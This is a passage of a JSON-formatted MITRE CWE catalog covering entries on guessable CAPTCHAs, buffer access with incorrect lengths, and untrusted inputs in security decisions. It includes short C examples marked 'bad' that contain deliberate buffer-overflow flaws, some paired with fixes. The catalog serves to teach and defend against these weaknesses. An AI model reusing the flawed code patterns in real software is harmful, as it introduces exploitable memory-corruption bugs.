Anti-Automation"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-731"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2010-01-15","Submission_Comment":"New entry to handle anti-automation as identified in WASC."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"804":{"attr":{"@_ID":"804","@_Name":"Guessable CAPTCHA","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses a CAPTCHA challenge, but the challenge can be guessed or automatically recognized by a non-human actor.","Extended_Description":{"xhtml:p":["An automated attacker could bypass the intended protection of the CAPTCHA challenge and perform actions at a higher frequency than humanly possible, such as launching spam attacks.","There can be several different causes of a guessable CAPTCHA:"],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["An audio or visual image that does not have sufficient distortion from the unobfuscated source image.","A question is generated that with a format that can be automatically recognized, such as a math question.","A question for which the number of possible answers is limited, such as birth years or favorite sports teams.","A general-knowledge or trivia question for which the answer can be accessed using a data base, such as country capitals or popular actors.","Other data associated with the CAPTCHA may provide hints about its contents, such as an image whose filename contains the word that is used in the CAPTCHA."]}}},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"863","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"287","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"330","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Name":"Web Server","@_Prevalence":"Sometimes"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Access Control","Other"],"Impact":["Bypass Protection Mechanism","Other"],"Note":"When authorization, authentication, or another protection mechanism relies on CAPTCHA entities to ensure that only human actors can access certain functionality, then an automated attacker such as a bot may access the restricted functionality by guessing the CAPTCHA."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":21,"Entry_Name":"Insufficient Anti-Automation"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-731"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2010-01-15","Submission_Comment":"New entry to handle anti-automation as identified in WASC."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Likelihood_of_Exploit"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"805":{"attr":{"@_ID":"805","@_Name":"Buffer Access with Incorrect Length Value","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses a sequential operation to read or write a buffer, but it uses an incorrect length value that causes it to access memory that is outside of the bounds of the buffer.","Extended_Description":"When the length value exceeds the size of the destination, a buffer overflow could occur.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1340","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":[{"Ordinality":"Resultant"},{"Ordinality":"Primary"}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Often"}},{"attr":{"@_Name":"C++","@_Prevalence":"Often"}},{"attr":{"@_Class":"Assembly","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":["Integrity","Confidentiality","Availability"],"Impact":["Read Memory","Modify Memory","Execute Unauthorized Code or Commands"],"Note":"Buffer overflows often can be used to execute arbitrary code, which is usually outside the scope of a program\'s implicit security policy. This can often be used to subvert any other security service."},{"Scope":"Availability","Impact":["Modify Memory","DoS: Crash, Exit, or Restart","DoS: Resource Consumption (CPU)"],"Note":"Buffer overflows generally lead to crashes. Other attacks leading to lack of availability are possible, including putting the program into an infinite loop."}]},"Detection_Methods":{"Detection_Method":[{"attr":{"@_Detection_Method_ID":"DM-1"},"Method":"Automated Static Analysis","Description":{"xhtml:p":["This weakness can often be detected using automated static analysis tools. Many modern tools use data flow analysis or constraint-based techniques to minimize the number of false positives.","Automated static analysis generally does not account for environmental considerations when reporting out-of-bounds memory operations. This can make it difficult for users to determine which warnings should be investigated first. For example, an analysis tool might report buffer overflows that originate from command line arguments in a program that is not expected to run with setuid or other special privileges."]},"Effectiveness":"High","Effectiveness_Notes":"Detection techniques for buffer-related errors are more mature than for most other weakness types."},{"attr":{"@_Detection_Method_ID":"DM-2"},"Method":"Automated Dynamic Analysis","Description":"This weakness can be detected using dynamic tools and techniques that interact with the software using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The software\'s operation may slow down, but it should not become unstable, crash, or generate incorrect results.","Effectiveness":"Moderate","Effectiveness_Notes":"Without visibility into the code, black box methods may not be able to sufficiently distinguish this weakness from others, requiring manual methods to diagnose the underlying problem."},{"attr":{"@_Detection_Method_ID":"DM-9"},"Method":"Manual Analysis","Description":"Manual analysis can be useful for finding this weakness, but it might not achieve desired code coverage within limited time constraints. This becomes difficult for weaknesses that must be considered for all inputs, since the attack surface can be too large."}]},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-3"},"Phase":"Requirements","Strategy":"Language Selection","Description":{"xhtml:p":["Use a language that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.","For example, many languages that perform their own memory management, such as Java and Perl, are not subject to buffer overflows. Other languages, such as Ada and C#, typically provide overflow protection, but the protection can be disabled by the programmer.","Be wary that a language\'s interface to native code may still be subject to overflows, even if the language itself is theoretically safe."]}},{"attr":{"@_Mitigation_ID":"MIT-4.1"},"Phase":"Architecture and Design","Strategy":"Libraries or Frameworks","Description":{"xhtml:p":["Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.","Examples include the Safe C String Library (SafeStr) by Messier and Viega [REF-57], and the Strsafe.h library from Microsoft [REF-56]. These libraries provide safer versions of overflow-prone string-handling functions."]},"Effectiveness_Notes":"This is not a complete solution, since many buffer overflows are not related to strings."},{"attr":{"@_Mitigation_ID":"MIT-10"},"Phase":"Build and Compilation","Strategy":"Compilation or Build Hardening","Description":{"xhtml:p":["Run or compile the software using features or extensions that automatically provide a protection mechanism that mitigates or eliminates buffer overflows.","For example, certain compilers and extensions provide automatic buffer overflow detection mechanisms that are built into the compiled code. Examples include the Microsoft Visual Studio /GS flag, Fedora/Red Hat FORTIFY_SOURCE GCC flag, StackGuard, and ProPolice."]},"Effectiveness":"Defense in Depth","Effectiveness_Notes":"This is not necessarily a complete solution, since these mechanisms can only detect certain types of overflows. In addition, an attack could still cause a denial of service, since the typical response is to exit the application."},{"attr":{"@_Mitigation_ID":"MIT-9"},"Phase":"Implementation","Description":{"xhtml:p":"Consider adhering to the following rules when allocating and managing an application\'s memory:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Double check that the buffer is as large as specified.","When using functions that accept a number of bytes to copy, such as strncpy(), be aware that if the destination buffer size is equal to the source buffer size, it may not NULL-terminate the string.","Check buffer boundaries if accessing the buffer in a loop and make sure there is no danger of writing past the allocated space.","If necessary, truncate all input strings to a reasonable length before passing them to the copy and concatenation functions."]}}}},{"attr":{"@_Mitigation_ID":"MIT-15"},"Phase":"Architecture and Design","Description":"For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server."},{"attr":{"@_Mitigation_ID":"MIT-11"},"Phase":"Operation","Strategy":"Environment Hardening","Description":{"xhtml:p":["Run or compile the software using features or extensions that randomly arrange the positions of a program\'s executable and libraries in memory. Because this makes the addresses unpredictable, it can prevent an attacker from reliably jumping to exploitable code.","Examples include Address Space Layout Randomization (ASLR) [REF-58] [REF-60] and Position-Independent Executables (PIE) [REF-64]."]},"Effectiveness":"Defense in Depth","Effectiveness_Notes":"This is not a complete solution. However, it forces the attacker to guess an unknown value that changes every program execution. In addition, an attack could still cause a denial of service, since the typical response is to exit the application."},{"attr":{"@_Mitigation_ID":"MIT-12"},"Phase":"Operation","Strategy":"Environment Hardening","Description":"Use a CPU and operating system that offers Data Execution Protection (NX) or its equivalent [REF-60] [REF-61].","Effectiveness":"Defense in Depth","Effectiveness_Notes":"This is not a complete solution, since buffer overflows could be used to overwrite nearby variables to modify the software\'s state in dangerous ways. In addition, it cannot be used in cases in which self-modifying code is required. Finally, an attack could still cause a denial of service, since the typical response is to exit the application."},{"attr":{"@_Mitigation_ID":"MIT-17"},"Phase":["Architecture and Design","Operation"],"Strategy":"Environment Hardening","Description":"Run your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations."},{"attr":{"@_Mitigation_ID":"MIT-22"},"Phase":["Architecture and Design","Operation"],"Strategy":"Sandbox or Jail","Description":{"xhtml:p":["Run the code in a \\"jail\\" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software.","OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows the software to specify restrictions on file operations.","This may not be a feasible solution, and it only limits the impact to the operating system; the rest of the application may still be subject to compromise.","Be careful to avoid CWE-243 and other weaknesses related to jails."]},"Effectiveness":"Limited","Effectiveness_Notes":"The effectiveness of this mitigation depends on the prevention capabilities of the specific sandbox or jail being used and might only help to reduce the scope of an attack, such as restricting the attacker to certain system calls or limiting the portion of the file system that can be accessed."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-1"},"Intro_Text":"This example takes an IP address from a user, verifies that it is well formed and then looks up the hostname and copies it into a buffer.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"void host_lookup(char *user_supplied_addr){}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"struct hostent *hp;in_addr_t *addr;char hostname[64];in_addr_t inet_addr(const char *cp);validate_addr_form(user_supplied_addr);addr = inet_addr(user_supplied_addr);hp = gethostbyaddr( addr, sizeof(struct in_addr), AF_INET);strcpy(hostname, hp->h_name);","xhtml:br":["","","","","","","","","",""],"xhtml:i":"/*routine that ensures user_supplied_addr is in the right format for conversion */"}}}},"Body_Text":["This function allocates a buffer of 64 bytes to store the hostname under the assumption that the maximum length value of hostname is 64 bytes, however there is no guarantee that the hostname will not be larger than 64 bytes. If an attacker specifies an address which resolves to a very large hostname, then the function may overwrite sensitive data or even relinquish control flow to the attacker.","Note that this example also contains an unchecked return value (CWE-252) that can lead to a NULL pointer dereference (CWE-476)."]},{"attr":{"@_Demonstrative_Example_ID":"DX-114"},"Intro_Text":"In the following example, it is possible to request that memcpy move a much larger segment of memory than assumed:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int returnChunkSize(void *) {}int main() {}","xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...","xhtml:br":["","","","","",""],"xhtml:i":["/* if chunk info is valid, return the size of usable memory,","* else, return -1 to indicate an error","*/"]}},{"#text":"...memcpy(destBuf, srcBuf, (returnChunkSize(destBuf)-1));...","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}],"xhtml:br":""}},"Body_Text":"If returnChunkSize() happens to encounter an error it will return -1. Notice that the return value is not checked before the memcpy operation (CWE-252), so -1 can be passed as the size argument to memcpy() (CWE-805). Because memcpy() assumes that the value is unsigned, it will be interpreted as MAXINT-1 (CWE-195), and therefore will copy far more memory than is likely available to the destination buffer (CWE-787, CWE-788)."},{"Intro_Text":"In the following example, the source character string is copied to the dest character string using the method strncpy.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"...char source[21] = \\"the character string\\";char dest[12];strncpy(dest, source, sizeof(source)-1);...","xhtml:br":["","","",""]}},{"attr":{"@_Nature":"good","@_Language":"C"},"xhtml:div":{"#text":"...char source[21] = \\"the character string\\";char dest[12];strncpy(dest, source, sizeof(dest)-1);...","xhtml:br":["","","",""]}}],"Body_Text":"However, in the call to strncpy the source character string is used within the sizeof call to determine the number of characters to copy. This will create a buffer overflow as the size of the source character string is greater than the dest character string. The dest character string should be used within the sizeof call to ensure that the correct number of characters are copied, as shown below."},{"Intro_Text":"In this example, the method outputFilenameToLog outputs a filename to a log file. The method arguments include a pointer to a character string containing the file name and an integer for the number of characters in the string. The filename is copied to a buffer where the buffer size is set to a maximum size for inputs to the log file. The method then calls another method to save the contents of the buffer to the log file.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"#define LOG_INPUT_SIZE 40int outputFilenameToLog(char *filename, int length) {}","xhtml:br":["","",""],"xhtml:i":"// saves the file name to a log file","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"int success;char buf[LOG_INPUT_SIZE];strncpy(buf, filename, length);success = saveToLogFile(buf);return success;","xhtml:br":["","","","","","","","","","",""],"xhtml:i":["// buffer with size set to maximum size for input to log file","// copy filename to buffer","// save to log file"]}}}},{"attr":{"@_Nature":"good","@_Language":"C"},"xhtml:div":{"#text":"...strncpy(buf, filename, sizeof(buf)-1);...","xhtml:br":["","",""],"xhtml:i":"// copy filename to buffer"}}],"Body_Text":"However, in this case the string copy method, strncpy, mistakenly uses the length method argument to determine the number of characters to copy rather than using the size of the local character string, buf. This can lead to a buffer overflow if the number of characters contained in character string pointed to by filename is larger then the number of characters allowed for the local character string. The string copy method should use the buf character string within a sizeof call to ensure that only characters up to the size of the buf array are copied to avoid a buffer overflow, as shown below."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2011-1959","Description":"Chain: large length value causes buffer over-read (CWE-126)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1959"},{"Reference":"CVE-2011-1848","Description":"Use of packet length field to make a calculation, then copy into a fixed-size buffer","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1848"},{"Reference":"CVE-2011-0105","Description":"Chain: retrieval of length value from an uninitialized memory location","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0105"},{"Reference":"CVE-2011-0606","Description":"Crafted length value in document reader leads to buffer overflow","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0606"},{"Reference":"CVE-2011-0651","Description":"SSL server overflow when the sum of multiple length fields exceeds a given value","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0651"},{"Reference":"CVE-2010-4156","Description":"Language interpreter API function doesn\'t validate length argument, leading to information exposure","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4156"}]},"Affected_Resources":{"Affected_Resource":"Memory"},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"ARR38-C","Entry_Name":"Guarantee that library functions do not form invalid pointers","Mapping_Fit":"Imprecise"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"100"}},{"attr":{"@_CAPEC_ID":"256"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 6, "Why ACLs Are Important" Page 171"}},{"attr":{"@_External_Reference_ID":"REF-58"}},{"attr":{"@_External_Reference_ID":"REF-59"}},{"attr":{"@_External_Reference_ID":"REF-60"}},{"attr":{"@_External_Reference_ID":"REF-741"}},{"attr":{"@_External_Reference_ID":"REF-57"}},{"attr":{"@_External_Reference_ID":"REF-56"}},{"attr":{"@_External_Reference_ID":"REF-61"}},{"attr":{"@_External_Reference_ID":"REF-76"}},{"attr":{"@_External_Reference_ID":"REF-64"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2010-01-15"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Common_Consequences, Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Demonstrative_Examples, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature, Demonstrative_Examples, Likelihood_of_Exploit, References, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"}]}},"806":{"attr":{"@_ID":"806","@_Name":"Buffer Access Using Size of Source Buffer","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses the size of a source buffer when reading from or writing to a destination buffer, which may cause it to access memory that is outside of the bounds of the buffer.","Extended_Description":"When the size of the destination is smaller than the size of the source, a buffer overflow could occur.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"805","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":[{"Ordinality":"Resultant"},{"Ordinality":"Primary"}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Sometimes"}},{"attr":{"@_Name":"C++","@_Prevalence":"Sometimes"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":[{"Scope":"Availability","Impact":["Modify Memory","DoS: Crash, Exit, or Restart","DoS: Resource Consumption (CPU)"],"Note":"Buffer overflows generally lead to crashes. Other attacks leading to lack of availability are possible, including putting the program into an infinite loop."},{"Scope":["Integrity","Confidentiality","Availability"],"Impact":["Read Memory","Modify Memory","Execute Unauthorized Code or Commands"],"Note":"Buffer overflows often can be used to execute arbitrary code, which is usually outside the scope of a program\'s implicit security policy."},{"Scope":"Access Control","Impact":"Bypass Protection Mechanism","Note":"When the consequence is arbitrary code execution, this can often be used to subvert any other security service."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Use an abstraction library to abstract away risky APIs. Examples include the Safe C String Library (SafeStr) by Viega, and the Strsafe.h library from Microsoft. This is not a complete solution, since many buffer overflows are not related to strings."},{"Phase":"Build and Compilation","Description":"Use automatic buffer overflow detection mechanisms that are offered by certain compilers or compiler extensions. Examples include StackGuard, ProPolice and the Microsoft Visual Studio /GS flag. This is not necessarily a complete solution, since these canary-based mechanisms only detect certain types of overflows. In addition, the result is still a denial of service, since the typical response is to exit the application."},{"Phase":"Implementation","Description":"Programmers should adhere to the following rules when allocating and managing their applications memory: Double check that your buffer is as large as you specify. When using functions that accept a number of bytes to copy, such as strncpy(), be aware that if the destination buffer size is equal to the source buffer size, it may not NULL-terminate the string. Check buffer boundaries if calling this function in a loop and make sure there is no danger of writing past the allocated space. Truncate all input strings to a reasonable length before passing them to the copy and concatenation functions"},{"attr":{"@_Mitigation_ID":"MIT-11"},"Phase":"Operation","Strategy":"Environment Hardening","Description":{"xhtml:p":["Run or compile the software using features or extensions that randomly arrange the positions of a program\'s executable and libraries in memory. Because this makes the addresses unpredictable, it can prevent an attacker from reliably jumping to exploitable code.","Examples include Address Space Layout Randomization (ASLR) [REF-58] [REF-60] and Position-Independent Executables (PIE) [REF-64]."]},"Effectiveness":"Defense in Depth","Effectiveness_Notes":"This is not a complete solution. However, it forces the attacker to guess an unknown value that changes every program execution. In addition, an attack could still cause a denial of service, since the typical response is to exit the application."},{"attr":{"@_Mitigation_ID":"MIT-12"},"Phase":"Operation","Strategy":"Environment Hardening","Description":"Use a CPU and operating system that offers Data Execution Protection (NX) or its equivalent [REF-60] [REF-61].","Effectiveness":"Defense in Depth","Effectiveness_Notes":"This is not a complete solution, since buffer overflows could be used to overwrite nearby variables to modify the software\'s state in dangerous ways. In addition, it cannot be used in cases in which self-modifying code is required. Finally, an attack could still cause a denial of service, since the typical response is to exit the application."},{"Phase":["Build and Compilation","Operation"],"Description":"Most mitigating technologies at the compiler or OS level to date address only a subset of buffer overflow problems and rarely provide complete protection against even that subset. It is good practice to implement strategies to increase the workload of an attacker, such as leaving the attacker to guess an unknown value that changes every program execution."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"In the following example, the source character string is copied to the dest character string using the method strncpy.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"...char source[21] = \\"the character string\\";char dest[12];strncpy(dest, source, sizeof(source)-1);...","xhtml:br":["","","",""]}},{"attr":{"@_Nature":"good","@_Language":"C"},"xhtml:div":{"#text":"...char source[21] = \\"the character string\\";char dest[12];strncpy(dest, source, sizeof(dest)-1);...","xhtml:br":["","","",""]}}],"Body_Text":"However, in the call to strncpy the source character string is used within the sizeof call to determine the number of characters to copy. This will create a buffer overflow as the size of the source character string is greater than the dest character string. The dest character string should be used within the sizeof call to ensure that the correct number of characters are copied, as shown below."},{"Intro_Text":"In this example, the method outputFilenameToLog outputs a filename to a log file. The method arguments include a pointer to a character string containing the file name and an integer for the number of characters in the string. The filename is copied to a buffer where the buffer size is set to a maximum size for inputs to the log file. The method then calls another method to save the contents of the buffer to the log file.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"#define LOG_INPUT_SIZE 40int outputFilenameToLog(char *filename, int length) {}","xhtml:br":["","",""],"xhtml:i":"// saves the file name to a log file","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"int success;char buf[LOG_INPUT_SIZE];strncpy(buf, filename, length);success = saveToLogFile(buf);return success;","xhtml:br":["","","","","","","","","","",""],"xhtml:i":["// buffer with size set to maximum size for input to log file","// copy filename to buffer","// save to log file"]}}}},{"attr":{"@_Nature":"good","@_Language":"C"},"xhtml:div":{"#text":"...strncpy(buf, filename, sizeof(buf)-1);...","xhtml:br":["","",""],"xhtml:i":"// copy filename to buffer"}}],"Body_Text":"However, in this case the string copy method, strncpy, mistakenly uses the length method argument to determine the number of characters to copy rather than using the size of the local character string, buf. This can lead to a buffer overflow if the number of characters contained in character string pointed to by filename is larger then the number of characters allowed for the local character string. The string copy method should use the buf character string within a sizeof call to ensure that only characters up to the size of the buf array are copied to avoid a buffer overflow, as shown below."}]},"Affected_Resources":{"Affected_Resource":"Memory"},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-56"}},{"attr":{"@_External_Reference_ID":"REF-57"}},{"attr":{"@_External_Reference_ID":"REF-58"}},{"attr":{"@_External_Reference_ID":"REF-59"}},{"attr":{"@_External_Reference_ID":"REF-60"}},{"attr":{"@_External_Reference_ID":"REF-61"}},{"attr":{"@_External_Reference_ID":"REF-64"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2010-01-15"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Causal_Nature, Demonstrative_Examples, Likelihood_of_Exploit, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Potential_Mitigations"}]}},"807":{"attr":{"@_ID":"807","@_Name":"Reliance on Untrusted Inputs in a Security Decision","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The application uses a protection mechanism that relies on the existence or values of an input, but the input can be modified by an untrusted actor in a way that bypasses the protection mechanism.","Extended_Description":{"xhtml:p":["Developers may assume that inputs such as cookies, environment variables, and hidden form fields cannot be modified. However, an attacker could change these inputs using customized clients or other attacks. This change might not be detected. When security decisions such as authentication and authorization are made based on the values of these inputs, attackers can bypass the security of the software.","Without sufficient encryption, integrity checking, or other mechanism, any input that originates from an outsider cannot be trusted."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"693","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic."},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Access Control","Availability","Other"],"Impact":["Bypass Protection Mechanism","Gain Privileges or Assume Identity","Varies by Context"],"Note":"Attackers can bypass the security decision to access whatever is being protected. The consequences will depend on the associated functionality, but they can range from granting additional privileges to untrusted users to bypassing important security checks. Ultimately, this weakness may lead to exposure or modification of sensitive data, system crash, or execution of arbitrary code."}},"Detection_Methods":{"Detection_Method":[{"attr":{"@_Detection_Method_ID":"DM-10"},"Method":"Manual Static Analysis","Description":"Since this weakness does not 